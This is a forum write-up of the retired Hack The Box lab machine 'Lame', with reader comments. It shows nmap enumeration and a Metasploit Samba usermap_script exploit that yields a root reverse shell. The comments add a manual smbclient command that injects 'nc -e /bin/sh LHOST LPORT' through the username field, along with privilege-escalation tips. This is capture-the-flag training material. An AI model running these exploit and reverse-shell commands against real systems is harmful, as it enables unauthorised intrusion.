Lame write-up by Arrexel
I will be covering write-ups of all retired machines, so stay tuned for future posts!
Enumeration
As always, let's start by enumerating running services on the target:
Nmap
nmap -T4 -A -v 10.10.10.3
Starting Nmap 7.60 ( https://nmap.org ) at 2017-09-17 15:29 EDT
NSE: Loaded 146 scripts for scanning.
NSE: Script Pre-scanning.
Initiating NSE at 15:29
Completed NSE at 15:29, 0.00s elapsed
Initiating NSE at 15:29
Completed NSE at 15:29, 0.00s elapsed
Initiating Ping Scan at 15:29
Scanning 10.10.10.3 [4 ports]
Completed Ping Scan at 15:29, 0.23s elapsed (1 total hosts)
Initiating Parallel DNS resolution of 1 host. at 15:29
Completed Parallel DNS resolution of 1 host. at 15:29, 0.02s elapsed
Initiating SYN Stealth Scan at 15:29
Scanning 10.10.10.3 [1000 ports]
Discovered open port 22/tcp on 10.10.10.3
Discovered open port 21/tcp on 10.10.10.3
Discovered open port 139/tcp on 10.10.10.3
Discovered open port 445/tcp on 10.10.10.3
Completed SYN Stealth Scan at 15:29, 11.30s elapsed (1000 total ports)
Initiating Service scan at 15:29
Scanning 4 services on 10.10.10.3
Completed Service scan at 15:29, 11.36s elapsed (4 services on 1 host)
Initiating OS detection (try #1) against 10.10.10.3
Retrying OS detection (try #2) against 10.10.10.3
Initiating Traceroute at 15:29
Completed Traceroute at 15:29, 0.13s elapsed
Initiating Parallel DNS resolution of 2 hosts. at 15:29
Completed Parallel DNS resolution of 2 hosts. at 15:29, 0.02s elapsed
NSE: Script scanning 10.10.10.3.
Initiating NSE at 15:29
NSE: [ftp-bounce] PORT response: 500 Illegal PORT command.
Completed NSE at 15:30, 40.10s elapsed
Initiating NSE at 15:30
Completed NSE at 15:30, 0.00s elapsed
Nmap scan report for 10.10.10.3
Host is up (0.12s latency).
Not shown: 996 filtered ports
PORT STATE SERVICE VERSION
21/tcp open ftp vsftpd 2.3.4
|_ftp-anon: Anonymous FTP login allowed (FTP code 230)
| ftp-syst:
| STAT:
| FTP server status:
| Connected to 10.10.14.3
| Logged in as ftp
| TYPE: ASCII
| No session bandwidth limit
| Session timeout in seconds is 300
| Control connection is plain text
| Data connections will be plain text
| vsFTPd 2.3.4 - secure, fast, stable
|_End of status
22/tcp open ssh OpenSSH 4.7p1 Debian 8ubuntu1 (protocol 2.0)
| ssh-hostkey:
| 1024 60:0f:cf:e1:c0:5f:6a:74:d6:90:24:fa:c4:d5:6c:cd (DSA)
|_ 2048 56:56:24:0f:21:1d:de:a7:2b:ae:61:b1:24:3d:e8:f3 (RSA)
139/tcp open netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
445/tcp open netbios-ssn Samba smbd 3.0.20-Debian (workgroup: WORKGROUP)
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Aggressive OS guesses: OpenWrt White Russian 0.9 (Linux 2.4.30) (92%), Arris TG862G/CT cable modem (91%), Dell Integrated Remote Access Controller (iDRAC6) (91%), Linksys WET54GS5 WAP, Tranzeo TR-CPQ-19f WAP, or Xerox WorkCentre Pro 265 printer (91%), Linux 2.4.21 - 2.4.31 (likely embedded) (91%), Linux 2.4.27 (91%), Citrix XenServer 5.5 (Linux 2.6.18) (91%), Linux 2.6.22 (91%), Linux 2.6.8 - 2.6.30 (91%), Dell iDRAC 6 remote access controller (Linux 2.6) (91%)
No exact OS matches for host (test conditions non-ideal).
Uptime guess: 2.311 days (since Fri Sep 15 08:02:47 2017)
Network Distance: 2 hops
TCP Sequence Prediction: Difficulty=206 (Good luck!)
IP ID Sequence Generation: All zeros
Service Info: OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel
Host script results:
| smb-os-discovery:
| OS: Unix (Samba 3.0.20-Debian)
| NetBIOS computer name:
| Workgroup: WORKGROUP\x00
|_ System time: 2017-09-17T14:57:26-04:00
|_smb2-time: Protocol negotiation failed (SMB2)
TRACEROUTE (using port 22/tcp)
HOP RTT ADDRESS
1 123.67 ms 10.10.14.1
2 123.15 ms 10.10.10.3
So there is vsFTPd 2.3.4, which allows anonymous login in this instance. SSH is open, and so is Samba (version 3.0.20).
Samba
Metasploit has some neat modules for enumerating a few things related to Samba. Lets check out the named pipes, in case there is anything of interest.
msf > use auxiliary/scanner/smb/pipe_auditor
msf auxiliary(pipe_auditor) > show options
Module options (auxiliary/scanner/smb/pipe_auditor):
Name Current Setting Required Description
---- --------------- -------- -----------
RHOSTS yes The target address range or CIDR identifier
SMBDomain . no The Windows domain to use for authentication
SMBPass no The password for the specified username
SMBUser no The username to authenticate as
THREADS 1 yes The number of concurrent threads
msf auxiliary(pipe_auditor) > set rhosts 10.10.10.3
rhosts => 10.10.10.3
msf auxiliary(pipe_auditor) > run
[*] 10.10.10.3:139 - Pipes: \netlogon, \lsarpc, \samr, \eventlog, \lsass, \ntsvcs, \srvsvc, \wkssvc
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
Exploitation
vsFTPd
Right off the bat, a quick search for vsFTPd 2.3.4 shows that it had a built-in backdoor briefly for this version, and wouldn't you know, there is a Metasploit module for it.
exploit/unix/ftp/vsftpd_234_backdoor
msf auxiliary(smb_version) > use exploit/unix/ftp/vsftpd_234_backdoor
msf exploit(vsftpd_234_backdoor) > show options
Module options (exploit/unix/ftp/vsftpd_234_backdoor):
Name Current Setting Required Description
---- --------------- -------- -----------
RHOST yes The target address
RPORT 21 yes The target port (TCP)
Exploit target:
Id Name
-- ----
0 Automatic
msf exploit(vsftpd_234_backdoor) > set rhost 10.10.10.3
rhost => 10.10.10.3
msf exploit(vsftpd_234_backdoor) > run
[*] 10.10.10.3:21 - Banner: 220 (vsFTPd 2.3.4)
[*] 10.10.10.3:21 - USER: 331 Please specify the password.
[*] Exploit completed, but no session was created.
Darn, no luck. This copy must not contain the backdoor. A quick login and check as the anonymous FTP user gets us nowhere. We are jailed to an empty directory.
Samba
Another quick search for Samba 3.0.20 reveals CVE-2007-2447, which is an RCE vulnerability that requires no authentication. Metasploit also conveniently has a built-in module for this, so let's give it a shot.
Metasploit
exploit/multi/samba/usermap_script
msf exploit(vsftpd_234_backdoor) > use exploit/multi/samba/usermap_script
msf exploit(usermap_script) > show options
Module options (exploit/multi/samba/usermap_script):
Name Current Setting Required Description
---- --------------- -------- -----------
RHOST yes The target address
RPORT 139 yes The target port (TCP)
Exploit target:
Id Name
-- ----
0 Automatic
msf exploit(usermap_script) > set rhost 10.10.10.3
rhost => 10.10.10.3
msf exploit(usermap_script) > run
[*] Started reverse TCP double handler on 10.10.14.3:4444
[*] Accepted the first client connection...
[*] Accepted the second client connection...
[*] Command: echo 0MefBteS03VkpAjA;
[*] Writing to socket A
[*] Writing to socket B
[*] Reading from sockets...
[*] Reading from socket B
[*] B: "0MefBteS03VkpAjA\r\n"
[*] Matching...
[*] A is input...
[*] Command shell session 1 opened (10.10.14.3:4444 -> 10.10.10.3:55479) at 2017-09-17 15:52:35 -0400
pwd
/
whoami
root
Bingo! We are in as the root user. From here we just grab our flags from /home/makis/user.txt and /root/root.txt
Sign In to comment.
Quick Links
Categories
- 3.7K All Categories
- 2.6K Discussion
- 1.3K Machines
- 486 Challenges
- 26 RastaLabs
- 139 Exploits
- 39 Programming
- 626 Off-topic
- 1K Tutorials
- 568 Writeups
- 96 Video Tutorials
- 173 Tools
- 208 Other
- 29 Links
- 29 News
Comments
Nice one dude thanks for sharing
And for those who like to do things manually or they aren't allowed to use metasploit:
smbclient -U "/=\`nohup nc -e /bin/sh LHOST LPORT\`" -N -I 10.10.10.3 //LAME/tmpNice write up @Arrexel, you can also do this to pinpoint and see if it is vulnerable to smb vulns:
nmap -T4 -sS -sC -Pn -A --script smb-vuln* 10.10.10.3
great write up
Thumbs up to both of you
Can you please provide the "manual exploitation (exploit db exploit) process" as well for all of your tutorials??
Yea I will be adding that to them all from now on, will fix lame/legacy after I finish my next one.
Awesome thanks @Arrexel
Thanks for the tip and thanks @Arrexel for the tutorials! had been trying to manually make it work without luck.
The metasploit module seems to use an smb client implementation that sets up the session without ntlm. I can't seem to find the switch on smbclient that allows me to simulate that handshake (NT LANMAN 1.0), and have tried all max--protocol options.
I'm simply trying to ping my machine before getting onto the reverse shell part but I can't seem to trigger the payload, can you please confirm if your command above works for you?
Thanks and keep up the good work guys
ps. I'm aware the displayed command is HTML encoded
@ps3tsuneo Those html entities didn't show up before. Anyway I uploaded the commands here (I had tested them and they worked): https://github.com/Alamot/code-snippets/blob/master/hacking/HTB/Lame/lame.txt
Thanks a lot @alamot ! I did manage to make it work yesterday. Dont know if the problem was with my setup, but in case it helps others, I did have to tweak the smbclient settings a bit to disable spnego.
Also had to modify the command a bit to append a "." at the beginning (smbclient -U "./=`nohup nc -e /bin/sh LHOST LPORT`" -N -I 10.10.10.3 -p 139 //LAME/tmp)
Thanks for your quick reply!
This one returns:
Host script results:
|_smb-vuln-ms10-054: false
|_smb-vuln-ms10-061: false
why?
Can you please explain how you disabled spnego?
--option="client use spnego = no" not working here
I disabled it in /etc/samba/smb.conf, rebooted Kali and still not working
I am new so sorry if this too noob of a question.
The msf's smb/pipe_auditor shows me different output than what you have in the write-up. Here's what it looks like.
msf auxiliary(scanner/smb/pipe_auditor) > run
[] Scanned 1 of 1 hosts (100% complete)
[] Auxiliary module execution completed
msf auxiliary(scanner/smb/pipe_auditor) >
What am I doing wrong here?
Thanks.
"client use spnego = no" in the smb.conf file does not work for me ether... the result of the connection is the following:
If no "client use spnego = no" setting is set, the result is:
Ok, found another (almost the same) manual way which worked for me:
Setup listener:
Connect to the Lame using Smbclient:
Execute payload within SMB session:
Done. You should receive the connection to your listener:
The aggressive scan from Nmap (also known as
-A) is the same thing as-sC -sV --traceroute, but it may be change in the future (according to the Nmap Docs). So do not need specify-sCat command line whether-Ais present.Show +respect with who helped you out!
https://www.hackthebox.eu/home/users/profile/61374
You could also use RCE on port 3632 and get a user this way. I did privesc with firefart but I'm sure there are many other ways to get root.
OSCP
Twitter : https://twitter.com/N0Fix | CTF team website : https://sentrywhale.com/
Hey! I am not getting any results by the Nmap command. It says that the host is down, if it is up then use -Pn. I used that too but not getting anything. I am doing this for the first time. Do we have to use any VPN (from Access tab of HTB) to do this? I am on a Wi-Fi.
Are you able to reach other IPs? If not, then vpn issue. Are you vip member?
Reset the box and try...
I am able to reach any IPs outside HTB by nmap. When I try to probe any IP inside HTB retired machines, it fails.
I just straightaway started firing nmap on 10.10.10.3 from my terminal. I am playing as an individual and not a participant of any lab. Is there some pre-configuration that I need to do in HTB or my local machine?
I just straightaway started firing nmap on 10.10.10.3 from my terminal. I am playing as an individual and not a participant of any lab. Is there some pre-configuration that I need to do in HTB or my local machine?
Type your comment> @Nofix said:
I used also MSF exploit for port 3632, later I used nmap --interactive
Type your comment> @azasdf74M said:
I used an nmap script for RCE and then uploaded a shell via wget RCE and spotted the nmap issue right away.